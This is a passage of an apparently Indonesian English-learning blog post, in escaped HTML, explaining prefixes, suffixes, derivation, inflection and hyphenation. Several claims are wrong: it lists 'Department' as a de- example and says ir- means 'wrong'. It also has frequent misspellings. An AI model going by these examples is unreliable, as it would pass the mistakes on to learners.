There are some very common prefixes in which the meaning may vary. Here are some examples;<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>The prefix \u201cun-\u201c can mean \u201cnot, remove, or opposite\u201d. Adding un- to the word \u201cclear\u201d gives us the word \u201cunclear,\u201d which means not clear. And as in the words;&nbsp;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Happy- unhappy<\/em><\/li>\n\n\n\n<li><em>Certain- uncertain<\/em><\/li>\n\n\n\n<li><em>Clear-unclear<\/em><\/li>\n\n\n\n<li><em>Do- undo<\/em><\/li>\n\n\n\n<li><em>Official- unofficial<\/em><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>The prefix Re- means \u201cagain\u201d or \u201cback,\u201d such as in the words;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Think- rethink&nbsp;<\/em><\/li>\n\n\n\n<li><em>Do- redo<\/em><\/li>\n\n\n\n<li><em>Pay- repay<\/em><\/li>\n\n\n\n<li><em>Play- replay<\/em><\/li>\n\n\n\n<li><em>Take- retake<\/em><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Un and re are the two most common prefixes in the English language<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Here are four-most-used prefixes;<\/em><\/p>\n\n\n\n<figure class=\"wp-block-table is-style-regular\"><table class=\"has-fixed-layout\"><thead><tr><th>Prefix<\/th><th>Meaning<\/th><th>Example<\/th><\/tr><\/thead><tbody><tr><td><em>Non-<\/em><em>Un-&nbsp;<\/em><em>Im-&nbsp;<\/em><em>In-&nbsp;<\/em><em>&nbsp;Il-<\/em><em>&nbsp;Ir-<\/em><\/td><td><em>Not, opposite<\/em><\/td><td><em>Nonsense<\/em><br><em>Unhappy<\/em><br><em>Impossible<\/em><br><em>Inaccurate<\/em><br><em>Illegal<\/em><br><em>Irregular<\/em><\/td><\/tr><tr><td><em>Re-&nbsp;<\/em><\/td><td><em>Again, back<\/em><\/td><td><em>Replay<\/em><br><em>Review<\/em><br><em>Reborn&nbsp;<\/em><\/td><\/tr><tr><td><em>Mis-<\/em><\/td><td><em>Wrongly, not<\/em><\/td><td><em>Misapply<\/em><br><em>Misunderstand<\/em><\/td><\/tr><tr><td><em>De-<\/em><\/td><td><em>Reverse, remove, out of<\/em><\/td><td><em>Deactivate<\/em><br><em>Destrucion<\/em><br><em>Department&nbsp;<\/em><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Different prefixes in English may have similar meanings, such as in-, un- and non- which all mean not or opposite of. Also, the prefixes ir- and mis- mean \u201cwrong,\u201d \u201cwrongly,\u201d or \u201cincorrectly.\u201d<\/em><\/p>\n\n\n\n<h2 class=\"gb-headline gb-headline-4c58fda8 gb-headline-text\"><strong>Now, let\u2019s turn to suffixes.<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><em>A suffix is an addition letter or letters at the end of a word. Suffixes are commonly used to show the word classes. For example, adding \u201cer\u201d to the verb \u201cdrive\u201d gives us \u201cdriver,\u201d the noun form of the word. As writen above that suffix is used to show the part of speech or word class or lexeme of the word that we add suffix into it (derivation), it changes the word class like;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>drive (verb) to driver (noun),&nbsp;<\/em><\/li>\n\n\n\n<li><em>mean (verb) to meaning (noun).&nbsp;<\/em><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Some suffixes do not at all change the word class (inflection) like ;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>slow (adj)&nbsp; to slower (adj),<\/em><\/li>\n\n\n\n<li><em>write (verb) to writing (verb)<\/em><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-derivation-and-inflection\"><strong><em>Derivation and inflection<\/em><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Derivation in affixition is an addition of a letter or letters to change its meaning or function and changes the word classes as well. for example; -ly changes the adjective bad into the adverb badly.<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>Most derivation change the word class, for example;&nbsp;<\/em>\n<ul class=\"wp-block-list\">\n<li><em>Read (verb) to the word reader (noun)<\/em><\/li>\n\n\n\n<li><em>Beauty (noun) to the word beautify (verb) to the word beautiful (adj).<\/em><\/li>\n\n\n\n<li><em>Soft (adj) to the word soften (verb) to the word softener (noun).<\/em><\/li>\n\n\n\n<li><em>Do (verb) doer (noun)<\/em><\/li>\n\n\n\n<li><em>Read (verb) reader (noun)<\/em><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><em>The majority of derivations in affixiation that don\u2019t change word classes are prefixes, for example, adding un- changes the meaning of the adjective happy but it is still an adjective unhappy.<\/em><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Inflection in affixiations is an addition of a letter or letters which carries grammatical meaning (for example, the plural -s in books or progressive -ing in readig). They do not change the word classes or meaning of the word; their function is to ensure that the word is in the appropriate form so the sentence is grammatically correct.<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>The six most common inflections in affixiation are <\/em><strong><em>\u201c-ed\/en, -ing, -s\/es, -\u2018s, -er, -est\u201d <\/em><\/strong><em>used in ;&nbsp;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>verb inflection (for example, -ed in visited, -ing in visiting, -s in visitss)<\/em>\n<ul class=\"wp-block-list\">\n<li><em>play \u2013 played (past form)<\/em><\/li>\n\n\n\n<li><em>play \u2013 playing (present progressive\/participle)<\/em><\/li>\n\n\n\n<li><em>play \u2013 plays (verb s\/es)<\/em><\/li>\n\n\n\n<li><em>eat \u2013 eaten (past participle)<\/em><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><em>noun inflection (for example, plural -s in houses and possessive -\u2018s in Adam\u2019s)&nbsp;<\/em>\n<ul class=\"wp-block-list\">\n<li><em>book \u2013 books (singular to plural)<\/em><\/li>\n\n\n\n<li><em>sarah \u2013 sarah\u2019s (possesive)<\/em><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><em>adjective inflection (for example, comparative -er in cheaper and superlative -est in cheapest).<\/em>\n<ul class=\"wp-block-list\">\n<li><em>Big- bigger, smart- smarter (comparative)<\/em><\/li>\n\n\n\n<li><em>Big- biggest, smart- smartest (superlative)<\/em><\/li>\n\n\n\n<li><em>Big- bigger- biggest (all are adjectives)<\/em><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>You may have noticed that -er appears as both a derivation and inflection.&nbsp;<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>-er&nbsp; when attached to a verb would cause the derivation: verb&nbsp; to noun,&nbsp;<\/em>\n<ul class=\"wp-block-list\">\n<li><em>do- doer,&nbsp;<\/em><\/li>\n\n\n\n<li><em>read- reader&nbsp;<\/em><\/li>\n\n\n\n<li><em>teach- teacher<\/em><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li><em>-er when attached to an adjective would show inflection, i.e., the comparative form of an adjective:&nbsp;<\/em>\n<ul class=\"wp-block-list\">\n<li><em>Big- bigger,<\/em><\/li>\n\n\n\n<li><em>smart- smarter<\/em><\/li>\n\n\n\n<li><em>nice&nbsp; nicer.&nbsp;&nbsp;&nbsp;<\/em><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Now you can make new words ith affixiaton. Remember that what we discuss is the common ones which means there are still more to learn. Keep learning, pursue your better English!<\/em><\/p>\n\n\n\n<h2 class=\"gb-headline gb-headline-5c664b2d gb-headline-text\"><strong><em>Deep dive<\/em><\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><em>Prefixes and Hyphens (-)<\/em><\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Unfortunately, there aren\u2019t any certain rules as to when we should use a hyphen (-) with a prefix; however, there are a few guidelines that we can follow to decide when to use a hyphen or not.<\/em><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><em>If the word with prefix can easily be confused with another existing word, e.g., re-pair and repair (to pair again and to fix something)<\/em><\/li>\n\n\n\n<li><em>If the prefix is ended by a vowel and the word begins with a vowel, e.g., anti-intellectual&nbsp;<\/em><\/li>\n\n\n\n<li><em>If the base word is one of&nbsp; proper noun and it should be capitalized, e.g., un-American<\/em><\/li>\n\n\n\n<li><em>When using dates and numbers, e.g., mid-century, pre-1980s.<\/em><strong><em> (frs)<\/em><\/strong><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Kalau menurut kalian artikel kami sangat bagus dan bermanfaat, jangan lupa share artikel kami di media sosial kalian.
